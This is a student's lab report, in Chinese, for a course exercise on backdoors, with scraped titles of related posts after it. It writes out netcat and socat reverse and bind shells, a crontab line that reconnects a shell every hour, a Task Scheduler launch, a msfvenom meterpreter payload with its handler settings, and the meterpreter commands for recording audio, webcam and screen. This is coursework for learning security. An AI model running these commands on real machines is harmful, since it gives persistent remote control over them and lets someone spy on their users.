20154318_王秀飞 Exp2 后门原理与实践
一、基础问题回答
1.例举你能想到的一个后门进入到你系统中的可能方式?
像上课老师讲的。国家级层面:操作系统以及编程软件;普通级别:软件、下载等。
2.例举你知道的后门如何启动起来(win及linux)的方式?
windows:实验中做过的方式有直接双击开启后门程序、通过Windows->控制面板->管理工具启动任务计划程序、开机自启动的后门、和其他程序捆绑运行的后门程序等。
linux:通过在cron中添加任务,定时执行、通过一些脚本启动后门程序、通过和其他程序捆绑运行后门程序。
3.Meterpreter有哪些给你映像深刻的功能?
摄像头权限难道还不恐怖么,电影斯诺登里面的伊斯兰妇女被偷拍,已经很恐怖了好么,我自己真的拍了自己一张照片。。。??????
4.如何发现自己有系统有没有被安装后门?
老师说,杀毒软件如果连我们学的都杀不出来,那他也不用混了,我觉得很对。所以第一,看杀毒软件。第二,你不知道的,你也没办法知道,所以我也不知道。
二、实验内容
(一)Windows获得Linux Shell
1.在Windows下,先使用ipconfig指令查看本机;在Linux下,使用ifconfig指令查看地址。
2.使用ncat.exe程序监听本机的4318端口:
在Kali环境下,使用nc指令的-e选项反向连接Windows主机的4318端口:
Windows下成功获得了一个Kali的shell,运行ls指令如下:
(二)Linux获得Windows Shell
1.使用 nc 指令监听4318端口:
在Windows下,使用ncat.exe程序的-e选项项反向连接Kali主机的4318端口:
Kali下可以看到Windows的命令提示,可以输入Windows命令:
(三)使用netcat获取主机操作Shell,cron启动
1.先在Windows系统下,监听4318端口:
2.在Kali环境下,使用man crontab指令查看crontab命令的帮助文档,从文档中我们可以知道crontab指令可以用于设置周期性被执行的指令。该命令从标准输入设备读取指令,并将其存放于crontab文件中,以供之后读取和执行。
3.用crontab -e指令编辑一条定时任务,选择编辑器时选择基本的vim编辑器就行:
4.在最后一行添加05 * * * * /bin/netcat 192.168.1.205 4318 -e /bin/sh,意思是在每个小时的第5分钟反向连接Windows主机的4318端口,就会启动cron。设置成05的原因是我当时的时间是20点05,为了能立马看到效果,所以我将时间设置在了2分钟以后:
5.当时间到了20点05时,此时已经获得了Kali的shell,可以输入指令:
(四)使用socat获取主机操作Shell, 任务计划启动
1.在Windows系统下,打开控制面板->管理工具->任务计划程序,创建任务,填写任务名称后,新建一个触发器:
2.下载安装socat软件,下载地址[https://gitee.com/wildlinux/NetSec/attach_files]
3.在操作->程序或脚本中选择你的socat.exe文件的路径,在添加参数一栏填写tcp-listen:4318 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe绑定到端口4318,同时把cmd.exe的stderr重定向到stdout上:
4.创建完成之后,再次打开时,可以发现之前创建的任务已经开始运行:
5.此时,在Kali环境下输入指令socat - tcp:192.168.1.205 4318,这里的第一个参数-代表标准的输入输出,第二个流连接到Windows主机的4318端口,此时可以发现已经成功获得了一个cmd shell:
(五)使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell
1.输入指令msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.174.129 LPORT=4318 -f exe > 20154318.exe生成后门程序:
2.通过nc指令将生成的后门程序传送到Windows主机上:(在做这一步之前先将本机的杀毒软件和防火墙关闭)
3.在Kali上使用msfconsole指令进入msf控制台,使用监听模块,设置payload,设置反弹回连的IP和端口:
MSF打开监听进程
msfconsole:进入msf
use exploit/multi/handler:进入handler模式
set payload windows/meterpreter/reverse_tcp:设置payload
set LHOST 192.168.174.129:设置LHOST
set LPORT 4318:设置LPORT
exploit:MSF开始监听
4.设置完成后,执行监听:
5.打开Windows上的后门程序:
6.此时Kali上已经获得了Windows主机的连接,并且得到了远程控制的shell:
(六)使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权
1.使用record_mic指令可以截获一段音频:
2.使用screenshot指令可以进行截屏:
3.使用webcam stream指令可以使用摄像头进行录像
三、实验感想
本次试验让我充分体会到了网络的可怕,一个命令就可以操控自己的所有电脑硬件(有足够权限与命令)。令人恐惧!
转载于:https://www.cnblogs.com/20154318-wxf/p/8666982.html
20154318_王秀飞 Exp2 后门原理与实践相关推荐
- 20155317王新玮《网络对抗》Exp2 后门原理与实践
20155317王新玮<网络对抗>Exp2 后门原理与实践 一.实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任务计划 ...
- Exp2 后门原理与实践 20164323段钊阳
220164323 Exp2 后门原理与实践 (1)例举你能想到的一个后门进入到你系统中的可能方式? 在使用盗版软件,盗版系统,甚至游戏外挂时,往往会让我们关闭杀毒软件,. (2)例举你知道的后门如何 ...
- 2018-2019 Exp2 后门原理与实践
2018-2019 Exp2 后门原理与实践 目录 一.实验内容说明及基础问题回答 二.工具准备 查看WindowsIP和LinuxIP Windows获得Linuxshell Linux 获得Win ...
- 2018-2019-2 网络对抗技术 20165301 Exp2 后门原理与实践
2018-2019-2 网络对抗技术 20165301 Exp2 后门原理与实践 实验内容 (1)使用netcat获取主机操作Shell,cron启动 (2)使用socat获取主机操作Shell, 任 ...
- 2019-2020-2 20175227张雪莹《网络对抗技术》 Exp2 后门原理与实践
2019-2020-2 20175227张雪莹<网络对抗技术> Exp2 后门原理与实践 目录 0. 基础知识 1. 实验内容 1.0 常用后门工具 1.1 使用netcat获取主机操作S ...
- Exp2 后门原理与实践 20164321 王君陶
Exp2 后门原理与实践 20164321 王君陶 一.实验内容 基础问题回答: 1.例举你能想到的一个后门进入到你系统中的可能方式? 答:通过漏洞,点击陌生链接,或者浏览不良网页挂马. 2.例举你知 ...
- Exp2 后门原理与实践 20204308李文艳
Exp2 后门原理与实践 20204308李文艳 1. 基础问题 1.1 例举你能想到的一个后门进入到你系统中的可能方式? 1.2 例举你知道的后门如何启动起来(win及linux)的方式? 1.3 ...
- 2017-2018-2 20155314《网络对抗技术》Exp2 后门原理与实践
2017-2018-2 20155314<网络对抗技术>Exp2 后门原理与实践 目录 实验要求 实验内容 实验环境 预备知识 1.后门概念 2.常用后门工具 实验步骤 1 用nc或net ...
- Exp2 后门原理与实践
Exp2 后门原理与实践 实验环境 攻击机 kali 4.14(64位) (IP: 10.0.2.6/24) 靶机 ubuntu 16.04(32位) (IP: 10.0.2.4/24) window ...
最新文章
- 全球三大BCH(比特币现金)城市,有你想去的吗
- qt4 与php 通讯,Qt与外部程序通信问题
- mask rcnn算法分析_在modelarts上部署mask-rcnn模型
- Cocos2d-x内存管理研究二
- 文献记录(part43)--Multivariate time series clustering based on complex network
- 怎样开始学习ERP?
- 高频算法面试题(字符串) 242. 有效的字母异位词
- 新网数十万域名管理密码泄露
- Github1.3万星,迅猛发展的JAX对比TensorFlow、PyTorch
- JavaScript 数据类型梳理
- tomcat 8优化配置
- 如何优雅地计算多变量
- 为Struts 2.0做好准备
- [小知识] 关于Excel中行列的固定
- Java去除使用富文本编辑器时自动生成的标签
- 一测振系统包括微型计算机,实验六 拍振实验
- mscorsvw.exe是什么
- Arduino + RFID 读取 IC 卡 Arduino uno中获得RFID的UID 并通过串口转发RFID卡号
- 页面加载微信聊天记录图片不显示问题
- git pull指令报错:error: You have not concluded your merge (MERGE_HEAD exists).
热门文章
- 以下可以采用python语言保留字的是-以下选项中,不是Python语言保留字的是_学小易找答案...
- python有相关的证书可以考吗-python的证书
- 机器人编程语言python-机器人编程语言有哪些?
- python编程实例视屏-使用Python实现视频下载功能实例代码
- python常用命令汇总-酷帅吊炸天的 Pandas 常用操作命令汇总
- python画图代码彩虹-echarts绘制彩虹图
- python与c语言在语法上的区别-Python与C语言基础对比(Python快速入门)
- python处理excel字典-python从excel创建字典
- python中怎么比较两个列表-python中比较两个列表的实例方法
- 编程语言python特点-十种常用编程语言特点